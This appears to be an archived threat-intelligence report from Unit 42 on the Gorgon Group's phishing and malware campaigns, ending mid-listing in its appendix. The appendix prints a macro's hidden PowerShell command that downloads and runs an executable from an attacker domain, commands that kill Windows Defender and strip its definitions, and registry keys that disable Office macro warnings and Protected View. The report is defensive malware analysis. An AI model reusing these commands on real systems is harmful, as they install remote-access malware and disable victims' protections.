{ "id": "51787a93-4169-4a46-9d44-11eb812e2f67", "created_at": "2026-04-06T00:21:08.86184Z", "updated_at": "2026-04-10T03:35:56.576467Z", "deleted_at": null, "sha1_hash": "00b5096fa62da3207a20ccc6fe9d0a029f88780c", "title": "The Gorgon Group: Slithering Between Nation State and Cybercrime", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2342010, "plain_text": "The Gorgon Group: Slithering Between Nation State and Cybercrime\r\nBy Robert Falcone, David Fuertes, Josh Grunzweig, Kyle Wilhoit\r\nPublished: 2018-08-02 · Archived: 2026-04-02 10:41:56 UTC\r\nUnit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed\r\ntargeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of\r\nindividuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis\r\non some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in\r\nwhich they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are\r\ncalling Gorgon Group.\r\nIn addition to the numerous targeted attacks, Unit 42 discovered that the group also performed a litany of attacks and\r\noperations around the globe, involving both criminal as well as targeted attacks.\r\nStarting in February 2018, Palo Alto Networks Unit 42 identified a campaign of attacks performed by members of Gorgon\r\nGroup targeting governmental organizations in the United Kingdom, Spain, Russia, and the United States. Additionally,\r\nduring that time, members of Gorgon Group were also performing criminal operations against targets across the globe, often\r\nusing shared infrastructure with their targeted attack operations.\r\nGorgon Group's activity is interesting because in addition to traditional command and control (C2) domain utilization,\r\nGorgon Group used common URL shortening services to download payloads; ultimately providing an extensive list of click\r\ncounts and statistical data. Also, interestingly, Gorgon Group has a diverse and active criminal element. On much of the C2\r\ninfrastructure we identified several crimeware family samples. RATs such as NjRat and infostealers like Lokibot were\r\nleveraging the same C2 infrastructure as that of the targeted attacks.\r\nUsing numerous decoy documents and phishing emails, both styles of attacks lacked overall sophistication, but the\r\neffectiveness of this group and campaign cannot be denied.\r\nAttack Delivery and Infrastructure Analysis\r\nThe attack methodology, as well as analysis of several of the \".vbs\", \".doc\" and \".exe\" samples found hosted in the attacker's\r\ninfrastructure has been covered by 360 and Tuisec. Both 360 and Tuisec found that the most commonly observed and\r\nconsistent attack pattern consists of the following stages:\r\nFigure 1. Basic attacker methodology\r\nAt the initial stage, the phishing attempts are kept very simple and lightweight by using OLE2Link objects that will usually\r\nmake use of URL shortening services such as Bitly and t2m[.]io.\r\nFigure 2 OLE2Link content example\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 1 of 27\n\nWhile investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers\r\nwitnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was\r\none of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the\r\ndirectories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally,\r\nthere was a plethora of malware samples that were criminal in nature.\r\nFigure 3. Open directory listing of hxxp://stevemike-fireforce[.]info/\r\nBased on the contents and structure of the initial identified open directories, it was possible to find several infrastructure\r\npatterns in use. An example of a domain structure and malware delivery contents is shown in the following table:\r\nSHA-256 Infrastructure URL\r\n4e4967e3d39256049bc1054b966e5c609245fd3b2a934fda5cd1885526d8221e stemtopx[.]com/work/1.doc\r\nd2f58b08f8abfe5055f3c1f0b8d991dfe1deb62807a5336b134ce2fb36d87284 stemtopx[.]com/work/3.exe\r\ndb4d8d931f1b979cf32d311f9b03e851d3283b4f7e86252730247da25cf9f093 stemtopx[.]com/work/2.exe\r\n4c6e3d8fdb2394edffe4a5bc45a238749e929301efa8bcfa3a247b1ab68eac54 stemtopx[.]com/work/1.exe\r\n81de431987304676134138705fc1c21188ad7f27edf6b77a6551aa693194485e stemtopx[.]com/work/new/20.exe\r\n26151f1e24bc97532e49013fbe04919de1f51e346dba1f10ce2e389160f2fb9d stemtopx[.]com/work/new/3.exe\r\na100ce0a67c5890bcc38d2b6e30f9164dfe266126ec40a2fd7eb8e941dc7d025 stemtopx[.]com/work/new/2.exe\r\n806098afc2148dabb838b24c4dfaa148269ac3ddf769aee54e75d46bfef0c506 stemtopx[.]com/work/doc/20.doc\r\nbf37d6cb393b440f790ad2b333624fde079e10bfaeb44d65188e3ccc551c982f stemtopx[.]com/work/k/1.docx\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 2 of 27\n\n81de431987304676134138705fc1c21188ad7f27edf6b77a6551aa693194485e stemtopx[.]com/work/k/1s.exe\r\nTable 1. Malware samples and infrastructure for hxxp://stemtopx[.]com\r\nPattern Example\r\n[domain]/work/docnew/[filename]\r\n[domain]/administrator/help/[filename]\r\n[domain]/xe/m/[filename]\r\n[domain]/xe/s/[filename]\r\n[domain]/images/yupsia/exe/[filename]\r\n[domain]/images/yupsia/doc/[filename]\r\nTable 2. Examples of domain patterns\r\nThe Gorgon Group Crew Breakdown\r\nFinding accessible directories, in combination with their other operational security failures, made it easy to start connecting\r\nthe dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat,\r\nwe counted an additional four actors performing attacks as part of Gorgon Group. While it’s not known if the attackers\r\nphysically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas.\r\nfudpages\r\nOne member of Gorgon Group- we're calling ‘fudpages’, was found during this campaign activity based on their utilization\r\nof shared infrastructure. One specific Microsoft document drew our attention.\r\n(446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25)\r\nThis Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this\r\ndocument pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. \r\nAdditionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 3 of 27\n\nhosted on 91[.]234[.]99[.]206.\r\nFigure 4 WHOIS information for umarguzardijye[.]com\r\nFudpages, similar to other Gorgon Group members, made many of the same OPSEC failures of his or her fellow Gorgon\r\nGroup members.\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 4 of 27\n\nFigure 5 Open directory of umarguzardijye[.]com\r\nThe WHOIS record for our new domain, umarguzardijye[.]com, shows that the registrant organization is \"fudpages\" and the\r\naddress provided in Pakistan. When looking closer at the IP hosting umarguzardijye[.]com, we noticed 91[.]234[.]99[.]206\r\nhosts two additional domains that drew our attention-fudpages[.]ru and fudpage[.]ru. Fudpage appears to be a small\r\nmarketplace selling bulletproof hosting, RDP sessions, fake documents and a litany of additional malicious wares.\r\nFigure 6 Advertisement website for FUD pages and spamming tools\r\nListed on fudpage's marketplace are several pieces of contact information, which ultimately led us to an underground\r\npersona that was selling, distributing and trading maliciousness across underground forums.\r\nFigure 7. Underground forum posting for RAT\r\nOperating underground since at least 2016, fudpages is also active on streaming sites like Youtube, where they use it as an\r\nadvertising platform.\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 5 of 27\n\nFigure 8. Youtube video posting on how to perform malicious activities\r\nLike all of Gorgon Group’s members, Fudpage’s online profile, infrastructure utilization and standardization, connects them\r\nback to Gorgon Group. This connection to Gorgon Group helps illustrate the seemingly standardized methodologies Gorgon\r\nGroup most often employs.\r\nThe Tale of Two Intentions: Criminal and Targeted\r\nAs part of the investigation, Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon\r\nGroup crew uses shared infrastructure between cybercrime and targeted attacks. The crew combines both regular crime and\r\ntargeted attack objectives using the same domain infrastructure over time, rarely changing their TTPs.\r\nStarting in mid-February, Unit 42 researchers have been tracking an active campaign sharing a significant portion of\r\ninfrastructure leveraged by Gorgon Group for criminal and targeted attacks. In Figure 9, below, red indicates targeted IP\r\naddresses, malware, registrant information, and domains associated with the targeted attack campaign while blue indicates\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 6 of 27\n\ncriminal attack IP addresses, malware used, registrant information, and domains:\r\nFigure 9. Overlap between infrastructure\r\nWhile looking at the total cluster of Gorgon Group activity, it’s also interesting to look at the total click volume during the\r\ncampaign’s timeframe. Leveraging click counts for the campaign for Bitly, we were able to see Gorgon Group’s activity\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 7 of 27\n\nvolume increase throughout April.\r\nFigure 10. Total clicks performed on Gorgon Group infrastructure over time\r\nLooking specifically at one domain used in both cybercrime and targeted attacks, we can see a micro viewpoint into their\r\ncampaign. Between April 1, 2018 and May 30, 2018, we observed the domain stevemike-fireforce[.]info used in a Gorgon\r\nGroup cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack. This same domain\r\nwas also used during the same period of time in targeted attacks against several worldwide nation state agencies.\r\nAnalysis of the data allowed Unit 42 researchers to make some interesting conclusions:\r\nSeveral unique domains are used for both cybercrime and targeted attacks.\r\nThe amount of sessions for cybercrime is higher than targeted, as expected.\r\nThere is no specific pattern on when targeted attacks happen, the domains can initially be used for cybercrime and\r\nthen quickly utilized in a targeted attack with little warning.\r\nAs a graphical representation, Figure 11, below, indicates the amount of unique sessions observed for this domain over the\r\ncampaign’s operational time, representing the attack intention in two separate areas.\r\nIt's interesting to observe on April 24th, this domain delivers a targeted attack aimed at several worldwide governmental\r\nbodies, in the middle being of also being used in the delivery of a malspam campaign. The subject used in this case of\r\ntargeted attack was \"Pakistan eying Sukhoi-35 figther planes as part of defense deal from Rusia\":\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 8 of 27\n\nFigure 11 Crimeware activity versus targeted activity against stevemike-fireforce[.]info\r\nIn order to have a better idea of the volume of unique attacks per date and intention, see the following volume-based\r\nrepresentation in Figure 12, where targeted attack volumes are represented in red and crime in green:\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 9 of 27\n\nFigure 12. Volume of crimeware activity versus targeted attacks using stevemike-fireforce[.]info\r\nFocusing on one domain allowed us to quickly understand its usage and better understand how it interconnects to a larger\r\nmalspam campaign.\r\nIntention #1: Cybercrime\r\nCriminal attacks are not new to this crew, some of which was covered in our previous blog for Gorgon Group member\r\nSubaat. During the current campaign, Gorgon Group’s criminal enterprises netted 132,840 Bitly clicks from mid-February to\r\nthe present. Targeting a large cross-section of industries, there was little in terms of targeting during their criminal activity.\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 10 of 27\n\nFigure 13. Criminal Attacks Bitly Link Clicks Worldwide\r\nA majority of the crimeware distribution was done via standard malspam campaigns leveraging well-known \"Purchase\r\nOrder\" and \"SWIFT\" lures. Most of the filenames included a variance of filenames like:\r\nSWIFT {Date}.doc\r\nSWIFT COPY.doc\r\nPURCHASE ORDER {Random Value}.doc\r\nDHL_RECEIPT {Random Value}.doc\r\nSHIPPING RECEIPT {Date}.doc\r\nThe tools used by the crew do not really differ in general crime vs more targeted attacks, in both instances they related to\r\nseveral remote access and data stealing malware families. The top five malware families identified as criminal in nature so\r\nfar have been the following:\r\nNjRAT: NjRAT is a remote-access Trojan commonly used and witnessed in attacks that are both criminal and\r\ntargeted attacks since as early as 2013.\r\nRevengeRAT : RevengeRAT is a remote-access Trojan that was released for free on underground forums in 2016.\r\nWhile RevengeRAT could be used in targeted attack campaigns, it is commonly witnessed in criminal malspam\r\ncampaigns.\r\nLokiBot: LokiBot is a commodity malware sold on underground sites which is designed to steal private data from\r\ninfected machines, and then submit that info to a command and control host via HTTP POST. This private data\r\nincludes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\r\nRemcosRAT: RemcosRAT is a remote-access Trojan that first appeared in underground forums in July of 2016. The\r\nRemcosRAT has a feature-rich builder, which allows for the creation of Microsoft Word documents with malicious\r\nmacros.\r\nNanoCoreRAT: Generally delivered via phishing, NanocoreRAT is a remote-access Trojan that opens a back door and\r\nsteals information from the compromised computer.\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 11 of 27\n\nOne interesting note about the criminal activity of Gorgon Group is their usage of Bitly. Similar to that of their targeted\r\nattacks, Gorgon Group leveraged Bitly for distribution and shortening of C2 domains. Using the same techniques across\r\nboth their criminal and targeted activity, made it easier for us to cluster Gorgon Group infrastructure and activity.\r\nFigure 14. Clicks on Bitly links in criminal attacks\r\nOverall, in spite of the lack of sophistication in Gorgon Group’s activity, they were still relatively successful; once again\r\nproving that simple attacks on individuals without proper protections, work.\r\nIntention #2: Targeted Attacks\r\nBeginning in early March 2018, Unit 42 started observing targeted attacks against Russian, Spanish and United States\r\ngovernment agencies operating in Pakistan. As we continued to investigate, it became apparent that Gorgon Group had been\r\nconsistently targeting worldwide governmental organizations operating within Pakistan. While Gorgon Group has been\r\nmaking minor changes in their methodologies, they are still actively involved in both targeted and criminal attacks.\r\nThis Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199.\r\nThe spear phishing emails involved in this campaign would most often originate from Gmail accounts masquerading as\r\nlegitimate individuals, such as a prominent Lt. Col in the Pakistani military.\r\nThe subjects of the spear phishing emails were also interesting, often contained subject matter related to terrorist groups,\r\nmilitary activity, or political topics.\r\nActing FOREIGN Minister of Pakistan\r\nInvitation to lady wives of H.E. Ambassador/High Commissioner from lady wife of H.E. High Commissioner of\r\nBangladesh\r\nPakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143\r\nPG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan\r\nPress Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018\r\nAfghan Bomb Blast report by ISI\r\nUSAJOBS Daily Saved Search Results for New GS15 for 3/30/2018\r\nHow Rigging take place in Senate Elections in Pakistan\r\nAfghan Terrorist group details ISI Restricted113\r\n1971 Liberation War Freedom Fighters in Pakistan Army Custody Database\r\nAdditionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included):\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 12 of 27\n\nLiberation Freedom Fighter.xlam\r\nNSC details of participants.xlam\r\nRaw Sect Vikram report on Pak Army Confidential.doc\r\nUSA Immagration Policy for Families.ppam\r\ndoc\r\nCV FM.doc\r\ndoc\r\nSukhoi35 deal report.doc\r\nNominal Roll.doc\r\nPress Release 17 April.doc\r\nAfghan Blast report by ISI.doc\r\nRigging in Pakistan Senate.doc\r\nAfghan Terrorist group report.doc\r\nThe payloads for these attacks varied in malware family. The popular NanoCoreRAT, QuasarRAT, and NJRAT variants were\r\nused heavily.\r\nIn a number of these attacks, the popular third-party URL shortening service Bitly was used to ultimately deliver the\r\npayloads for these attacks.\r\nIt's important to remember, that while we were using Bitly links to help gauge click location, anyone who clicks these links\r\n(including researchers) are also counted. So, while having this click information is valuable, it's only one small piece of a\r\nlarger picture related to targeting.\r\nFigure 15. Bitly Click Information Related to a Gorgon Group C2 Domain\r\nThe heaviest concentration of Bitly URL interaction came from Pakistan, which at 410 clicks accounted for 39% of all\r\nclicks. The United States amassed 194 clicks, accounting for 19%.\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 13 of 27\n\nFigure 16 Clicks on Bitly links in targeted attacks\r\nThe attacks took place primarily in March, late April, and early May of this year.\r\nConclusion\r\nGorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks. What makes\r\nGorgon Group unique is, that despite the group’s operational security failures, they still remained particularly effective.\r\nLooking closer at the actors participating in Gorgon Group gave us a unique perspective into the inner workings of an attack.\r\nLeveraging the same infrastructure for targeted attacks and criminal enterprises made for an interesting cross-section of\r\nmixed intentions. Ultimately, this lead us to the conclusion that several of Gorgon Group’s members have a nexus in\r\nPakistan. While Gorgon Group remains active, Palo Alto Networks customers are protected from this threat in the following\r\nways:\r\nWildFire detects all current Gorgon Group files with malicious verdicts.\r\nAutoFocus customers can track these samples with the Gorgon Group actor tag.\r\nTraps blocks all of the files currently associated with Gorgon Group\r\nAppendix\r\nAnalysis of a targeted attack\r\n\"1971 Liberation War Freedom Fighters in Pakistan ArmyCustody Database98\"\r\nThe delivery documents used in the targeted attacks are Microsoft Office documents that contain a macro that attempts to\r\ncompromise the system. The infection process is rather interesting, as it involves multiple layers of .NET assemblies that\r\nwill eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another\r\nprocess. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection\r\nprocess not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the\r\nrecipient's suspicions of the entire process. Additionally, the process attempts to lower the overall security of the system by\r\ndisabling security features in Microsoft Office and Windows Defender. The payloads themselves are rather interesting, as the\r\ndeveloper wraps the malicious code with legitimate source code freely available online.\r\nDelivery document\r\nThe delivery document contains a macro that downloads an executable from a remote server. The macro downloads a\r\npayload from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.exe (SHA256:\r\n84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line\r\nprocess:\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 14 of 27\n\ncmd.exe /c powershell -W Hidden (New-Object\r\nSystem.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel[.]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start\r\nProcess '%Public%\\\\\\\\svchost32.exe\r\nThe macro then attempts to kill Microsoft Office and Windows Defender processes using the ‘taskkill’ command. The\r\ncommand does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel\r\nin the case of this “.xlam” file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher.\r\nThis blanket approach to kill the appropriate process suggests that the actor does not change this command within their\r\nmacro across delivery documents they created within these Microsoft Office applications. The command does not just\r\nattempt to kill the Windows Defender process, but also attempts to clear the detection definitions to not trigger an antivirus\r\nalert. The macro performs all of these activities with the following command:\r\ncmd /c taskkill /f /im winword.exe\u0026taskkill /f /im Excel.exe\u0026taskkill\r\n/f /im MSPUB.exe\u0026taskkill /f /im POWERPNT.EXE\u0026taskkill /f /im\r\nMSASCuiL.exe\u0026taskkill /f /im MpCmdRun.exe\u0026cd \"\"%ProgramFiles%\\Windows\r\nDefender\"\" \u0026 MpCmdRun.exe -removedefinitions -dynamicsignatures \u0026 exit\r\nThe macro also attempts to deactivate security mechanisms within Microsoft Office products by modifying the registry.\r\nFirst, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel by setting the\r\nfollowing registry keys to the value of 1:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\publisher\\Security\\VBAWarnings\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 15 of 27\n\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\publisher\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings\r\nThe macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and\r\nPowerPoint by setting the following registry keys to a value of 1:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 16 of 27\n\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV\r\nFirst Stage Payload\r\nThe payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and\r\ndecoy document. It appears the author of this downloader used the source code from an open source tool called \"Sales\r\nSystem Application\", which is freely available at hxxp://www.a1vbcode[.]com/app-2999.asp. We believe the author of the\r\ndownloader uses this Sales System Application to provide a legitimate look to their malicious payload. The malware author\r\nadds their own code to the application to run their malicious code before calling the legitimate functions that display the\r\ngraphical user interface. The following functions are called when the application attempts to initialize the menu:\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 17 of 27\n\nETransaksi.Speed(); // Legitimate class, but method is the first\r\nwrapped function that leads to malicious code\r\nProjectData.EndApp(); // Closes the application before rest of\r\nlegitimate Sales System Application functions are called\r\nThe \"Speed\" method in the legitimate ETransaksi class contains legitimate code from the Sales System Application;\r\nhowever, the author of this tool includes this code in an if/else construct that bypasses these instructions by setting a false\r\nflag to skip the legitimate code and execute the next step to the malicious code. The following code example shows the false\r\nflag being set (5 \u003e 115) and the ETransaksi.diomadnfagaghagh method being called:\r\nint num = 5;\r\nint num2 = 155;\r\nbool flag = num \u003e num2;\r\nif (flag)\r\n{\r\n    \u003clegitimate Sales System Application code\u003e\r\n}\r\nelse\r\n{\r\n    NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[]\r\n    {\r\n        null,\r\n        new object[0]\r\n    }, null, null, null, true);\r\nThe payload uses this technique to run a chain of methods that eventually carry out its malicious task. With the exception of\r\nthe ‘Speed’ method previously mentioned, the names of the methods called in this chain appear to be fairly random, as seen\r\nin the following list:\r\n1. ETransaksi.Speed\r\n2. ETransaksi.diomadnfagaghagh\r\n3. ETransaksi.fjcsERIfjfiojsGHIsdifjksi\r\n4. ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl\r\n5. ETransaksi.FJaioefgkaoeK\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 18 of 27\n\nThe last two methods in the chain carry out a majority of the first payload’s functionality. The\r\nETransaksi.gsgjIDJIGJIGJIGJIFDOSpl method obtains a resource named \"fgjfaieSDFAOKEfj.GSrdofjksrgj\", which is\r\ndecrypted in the ETransaksi.FJaioefgkaoeK method using a multibyte XOR cipher with the following key:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\nbyte[] array = new byte[]\r\n    {\r\n   